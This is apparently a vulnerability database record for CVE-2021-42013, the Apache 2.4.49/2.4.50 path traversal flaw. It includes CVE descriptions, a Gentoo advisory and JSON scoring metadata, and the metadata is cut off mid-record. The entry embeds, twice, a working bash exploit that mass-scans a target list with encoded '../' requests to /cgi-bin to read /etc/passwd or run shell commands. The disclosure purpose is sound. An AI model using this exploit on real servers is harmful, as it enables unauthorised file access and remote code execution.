var-202110-1690
Vulnerability from variot

It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.

This vulnerability information was reported directly to the product developer by the following person and, after coordination with the product developer, was announced on JVN in order to inform product users. Reporter: Mr. Shugo Kumasaka, Internet Initiative Co., Ltd. Files placed outside the document root that are not protected by "require all denied" may be accessed by a remote third party.

The server is fast, reliable and extensible through a simple API.

A NULL pointer dereference was found in Apache httpd mod_h2. The highest threat from this flaw is to system integrity. (CVE-2021-33193)

A NULL pointer dereference in httpd allows an unauthenticated remote malicious user to crash httpd by providing malformed HTTP requests. The highest threat from this vulnerability is to system availability. (CVE-2021-34798)

An out-of-bounds read in mod_proxy_uwsgi of httpd allows a remote unauthenticated malicious user to crash the service through a crafted request. The highest threat from this vulnerability is to system availability. (CVE-2021-36160)

An out-of-bounds write in function ap_escape_quotes of httpd allows an unauthenticated remote malicious user to crash the server or potentially execute code on the system with the privileges of the httpd user, by providing malicious input to the function. (CVE-2021-39275)

A Server-Side Request Forgery (SSRF) flaw was found in mod_proxy of httpd. This flaw allows a remote, unauthenticated malicious user to make the httpd server forward requests to an arbitrary server. The attacker could get, modify, or delete resources on other services that may be behind a firewall and inaccessible otherwise. The impact of this flaw varies based on what services and resources are available on the httpd network. (CVE-2021-40438)

While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project. (CVE-2021-41524)

A path traversal flaw was found in Apache 2.4.49. Additionally, this flaw could leak the source of interpreted files like CGI scripts. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. This is an incomplete fix for CVE-2021-41773. (CVE-2021-42013)

Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)

Date: 10/05/2021

Exploit Author: Lucas Souza https://lsass.io

Vendor Homepage: https://apache.org/

Version: 2.4.50

Tested on: 2.4.50

CVE : CVE-2021-42013

Credits: Ash Daulton and the cPanel Security Team

#!/bin/bash

if [[ $1 == '' ]]; [[ $2 == '' ]]; then
echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
echo ./PoC.sh targets.txt /etc/passwd
echo ./PoC.sh targets.txt /bin/sh id

exit
fi
for host in $(cat $1); do
echo $host
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2"; done

# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami

Gentoo Linux Security Advisory GLSA 202208-20

https://security.gentoo.org/

Severity: High
Title: Apache HTTPD: Multiple Vulnerabilities
Date: August 14, 2022
Bugs: #813429, #816399, #816864, #829722, #835131, #850622
ID: 202208-20


Synopsis

Multiple vulnerabilities have been discovered in Apache Webserver, the worst of which could result in remote code execution.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------
  1  app-admin/apache-tools     < 2.4.54                    >= 2.4.54
  2  www-servers/apache         < 2.4.54                    >= 2.4.54

Description

Multiple vulnerabilities have been discovered in Apache HTTPD. Please review the CVE identifiers referenced below for details.

Impact

Please review the referenced CVE identifiers for details.

Workaround

There is no known workaround at this time.

Resolution

All Apache HTTPD users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=www-servers/apache-2.4.54"

All Apache HTTPD tools users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=app-admin/apache-tools-2.4.54"

References

[ 1 ] CVE-2021-33193 https://nvd.nist.gov/vuln/detail/CVE-2021-33193
[ 2 ] CVE-2021-34798 https://nvd.nist.gov/vuln/detail/CVE-2021-34798
[ 3 ] CVE-2021-36160 https://nvd.nist.gov/vuln/detail/CVE-2021-36160
[ 4 ] CVE-2021-39275 https://nvd.nist.gov/vuln/detail/CVE-2021-39275
[ 5 ] CVE-2021-40438 https://nvd.nist.gov/vuln/detail/CVE-2021-40438
[ 6 ] CVE-2021-41524 https://nvd.nist.gov/vuln/detail/CVE-2021-41524
[ 7 ] CVE-2021-41773 https://nvd.nist.gov/vuln/detail/CVE-2021-41773
[ 8 ] CVE-2021-42013 https://nvd.nist.gov/vuln/detail/CVE-2021-42013
[ 9 ] CVE-2021-44224 https://nvd.nist.gov/vuln/detail/CVE-2021-44224
[ 10 ] CVE-2021-44790 https://nvd.nist.gov/vuln/detail/CVE-2021-44790
[ 11 ] CVE-2022-22719 https://nvd.nist.gov/vuln/detail/CVE-2022-22719
[ 12 ] CVE-2022-22720 https://nvd.nist.gov/vuln/detail/CVE-2022-22720
[ 13 ] CVE-2022-22721 https://nvd.nist.gov/vuln/detail/CVE-2022-22721
[ 14 ] CVE-2022-23943 https://nvd.nist.gov/vuln/detail/CVE-2022-23943
[ 15 ] CVE-2022-26377 https://nvd.nist.gov/vuln/detail/CVE-2022-26377
[ 16 ] CVE-2022-28614 https://nvd.nist.gov/vuln/detail/CVE-2022-28614
[ 17 ] CVE-2022-28615 https://nvd.nist.gov/vuln/detail/CVE-2022-28615
[ 18 ] CVE-2022-29404 https://nvd.nist.gov/vuln/detail/CVE-2022-29404
[ 19 ] CVE-2022-30522 https://nvd.nist.gov/vuln/detail/CVE-2022-30522
[ 20 ] CVE-2022-30556 https://nvd.nist.gov/vuln/detail/CVE-2022-30556
[ 21 ] CVE-2022-31813 https://nvd.nist.gov/vuln/detail/CVE-2022-31813

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/202208-20

Concerns?

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License

Copyright 2022 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202110-1690",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "http server",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apache",
        "version": "2.4.50"
      },
      {
        "model": "http server",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apache",
        "version": "2.4.49"
      },
      {
        "model": "instantis enterprisetrack",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "17.3"
      },
      {
        "model": "secure backup",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "18.1.0.1.0"
      },
      {
        "model": "instantis enterprisetrack",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "17.1"
      },
      {
        "model": "jd edwards enterpriseone tools",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "9.2.6.0"
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "34"
      },
      {
        "model": "instantis enterprisetrack",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "17.2"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "35"
      },
      {
        "model": "\u65e5\u7acb\u9ad8\u4fe1\u983c\u30b5\u30fc\u30d0 rv3000",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u7acb",
        "version": null
      },
      {
        "model": "http server",
        "scope": null,
        "trust": 0.8,
        "vendor": "apache",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2022-03220"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-000090"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-42013"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:http_server:2.4.50:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "9.2.6.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:secure_backup:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "18.1.0.1.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-42013"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Valentin Lobstein",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202110-413"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2021-42013",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "IPA",
            "availabilityImpact": "None",
            "baseScore": 5.0,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "JVNDB-2021-000090",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2022-03220",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2021-42013",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "IPA",
            "availabilityImpact": "None",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2021-000090",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-42013",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "IPA",
            "id": "JVNDB-2021-000090",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2022-03220",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202110-413",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-42013",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2022-03220"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-42013"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-000090"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202110-413"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-42013"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions. This vulnerability information is reported directly to the product developer by the following person, and after coordination with the product developer, the purpose is to inform the product user. JVN It was announced at. Reporter : Internet Initiative Co., Ltd. Shugo Kumasaka Mr\"\" placed outside the document root by a remote third party. require all denied \u201d may allow unprotected files to be accessed. The server is fast, reliable and extensible through a simple API. A NULL pointer dereference was found in Apache httpd mod_h2. The highest threat from this flaw is to system integrity. (CVE-2021-33193)\nA NULL pointer dereference in httpd allows an unauthenticated remote malicious user to crash httpd by providing malformed HTTP requests. The highest threat from this vulnerability is to system availability. (CVE-2021-34798)\nAn out-of-bounds read in mod_proxy_uwsgi of httpd allows a remote unauthenticated malicious user to crash the service through a crafted request. The highest threat from this vulnerability is to system availability. (CVE-2021-36160)\nAn out-of-bounds write in function ap_escape_quotes of httpd allows an unauthenticated remote malicious user to crash the server or potentially execute code on the system with the privileges of the httpd user, by providing malicious input to the function. (CVE-2021-39275)\nA Server-Side Request Forgery (SSRF) flaw was found in mod_proxy of httpd. 
This flaw allows a remote, unauthenticated malicious user to make the httpd server forward requests to an arbitrary server. The attacker could get, modify, or delete resources on other services that may be behind a firewall and inaccessible otherwise. The impact of this flaw varies based on what services and resources are available on the httpd network. (CVE-2021-40438)\nWhile fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project. (CVE-2021-41524)\nA path transversal flaw was found in Apache 2.4.49. Additionally this flaw could leak the source of interpreted files like CGI scripts. Additionally, this flaw could leak the source of interpreted files like CGI scripts. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. This is an incomplete fix for CVE-2021-41773. (CVE-2021-42013). # Exploit: Apache HTTP Server 2.4.50 - Path Traversal \u0026 Remote Code Execution (RCE)\n# Date: 10/05/2021\n# Exploit Author: Lucas Souza https://lsass.io\n# Vendor Homepage:  https://apache.org/\n# Version: 2.4.50\n# Tested on: 2.4.50\n# CVE : CVE-2021-42013\n# Credits: Ash Daulton and the cPanel Security Team\n\n#!/bin/bash\n\nif [[ $1 == \u0027\u0027 ]]; [[ $2 == \u0027\u0027 ]]; then\necho Set [TAGET-LIST.TXT] [PATH] [COMMAND]\necho ./PoC.sh targets.txt /etc/passwd\necho ./PoC.sh targets.txt /bin/sh id\n\nexit\nfi\nfor host in $(cat $1); do\necho $host\ncurl -s --path-as-is -d \"echo Content-Type: text/plain; echo; $3\" \"$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2\"; done\n\n# PoC.sh targets.txt /etc/passwd\n# PoC.sh targets.txt /bin/sh whoami\n\n. 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 202208-20\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                           https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n    Title: Apache HTTPD: Multiple Vulnerabilities\n     Date: August 14, 2022\n     Bugs: #813429, #816399, #816864, #829722, #835131, #850622\n       ID: 202208-20\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n=======\nMultiple vulnerabilities have been discovered in Apache Webserver, the\nworst of which could result in remote code execution. \n\nAffected packages\n================\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  app-admin/apache-tools     \u003c 2.4.54                    \u003e= 2.4.54\n  2  www-servers/apache         \u003c 2.4.54                    \u003e= 2.4.54\n\nDescription\n==========\nMultiple vulnerabilities have been discovered in Apache HTTPD. Please\nreview the CVE identifiers referenced below for details. \n\nImpact\n=====\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n=========\nThere is no known workaround at this time. 
\n\nResolution\n=========\nAll Apache HTTPD users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=www-servers/apache-2.4.54\"\n\nAll Apache HTTPD tools users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=app-admin/apache-tools-2.4.54\"\n\nReferences\n=========\n[ 1 ] CVE-2021-33193\n      https://nvd.nist.gov/vuln/detail/CVE-2021-33193\n[ 2 ] CVE-2021-34798\n      https://nvd.nist.gov/vuln/detail/CVE-2021-34798\n[ 3 ] CVE-2021-36160\n      https://nvd.nist.gov/vuln/detail/CVE-2021-36160\n[ 4 ] CVE-2021-39275\n      https://nvd.nist.gov/vuln/detail/CVE-2021-39275\n[ 5 ] CVE-2021-40438\n      https://nvd.nist.gov/vuln/detail/CVE-2021-40438\n[ 6 ] CVE-2021-41524\n      https://nvd.nist.gov/vuln/detail/CVE-2021-41524\n[ 7 ] CVE-2021-41773\n      https://nvd.nist.gov/vuln/detail/CVE-2021-41773\n[ 8 ] CVE-2021-42013\n      https://nvd.nist.gov/vuln/detail/CVE-2021-42013\n[ 9 ] CVE-2021-44224\n      https://nvd.nist.gov/vuln/detail/CVE-2021-44224\n[ 10 ] CVE-2021-44790\n      https://nvd.nist.gov/vuln/detail/CVE-2021-44790\n[ 11 ] CVE-2022-22719\n      https://nvd.nist.gov/vuln/detail/CVE-2022-22719\n[ 12 ] CVE-2022-22720\n      https://nvd.nist.gov/vuln/detail/CVE-2022-22720\n[ 13 ] CVE-2022-22721\n      https://nvd.nist.gov/vuln/detail/CVE-2022-22721\n[ 14 ] CVE-2022-23943\n      https://nvd.nist.gov/vuln/detail/CVE-2022-23943\n[ 15 ] CVE-2022-26377\n      https://nvd.nist.gov/vuln/detail/CVE-2022-26377\n[ 16 ] CVE-2022-28614\n      https://nvd.nist.gov/vuln/detail/CVE-2022-28614\n[ 17 ] CVE-2022-28615\n      https://nvd.nist.gov/vuln/detail/CVE-2022-28615\n[ 18 ] CVE-2022-29404\n      https://nvd.nist.gov/vuln/detail/CVE-2022-29404\n[ 19 ] CVE-2022-30522\n      https://nvd.nist.gov/vuln/detail/CVE-2022-30522\n[ 20 ] CVE-2022-30556\n      https://nvd.nist.gov/vuln/detail/CVE-2022-30556\n[ 21 ] CVE-2022-31813\n      
https://nvd.nist.gov/vuln/detail/CVE-2022-31813\n\nAvailability\n===========\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202208-20\n\nConcerns?\n========\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n======\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-42013"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-000090"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2022-03220"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-42013"
      },
      {
        "db": "PACKETSTORM",
        "id": "164501"
      },
      {
        "db": "PACKETSTORM",
        "id": "168072"
      }
    ],
    "trust": 2.43
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-42013",
        "trust": 3.4
      },
      {
        "db": "JVN",
        "id": "JVN51106450",
        "trust": 2.4
      },
      {
        "db": "PACKETSTORM",
        "id": "164501",
        "trust": 1.7
      },
      {
        "db": "PACKETSTORM",
        "id": "164941",
        "trust": 1.6
      },
      {
        "db": "PACKETSTORM",
        "id": "164629",
        "trust": 1.6
      },
      {
        "db": "PACKETSTORM",
        "id": "167397",
        "trust": 1.6
      },
      {
        "db": "PACKETSTORM",
        "id": "164609",
        "trust": 1.6
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/10/08/2",
        "trust": 1.6
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/10/15/3",
        "trust": 1.6
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/10/07/6",
        "trust": 1.6
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/10/09/1",
        "trust": 1.6
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/10/08/6",
        "trust": 1.6
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/10/16/1",
        "trust": 1.6
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/10/08/1",
        "trust": 1.6
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/10/08/5",
        "trust": 1.6
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/10/11/4",
        "trust": 1.6
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/10/08/4",
        "trust": 1.6
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/10/08/3",
        "trust": 1.6
      },
      {
        "db": "PACKETSTORM",
        "id": "165089",
        "trust": 1.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-000090",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "168072",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2022-03220",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "50512",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "50446",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "50406",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.3348",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021101513",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022042513",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021100718",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021100802",
        "trust": 0.6
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2021100131",
        "trust": 0.6
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2021110108",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202110-413",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-42013",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2022-03220"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-42013"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-000090"
      },
      {
        "db": "PACKETSTORM",
        "id": "165089"
      },
      {
        "db": "PACKETSTORM",
        "id": "164501"
      },
      {
        "db": "PACKETSTORM",
        "id": "168072"
      },
      {
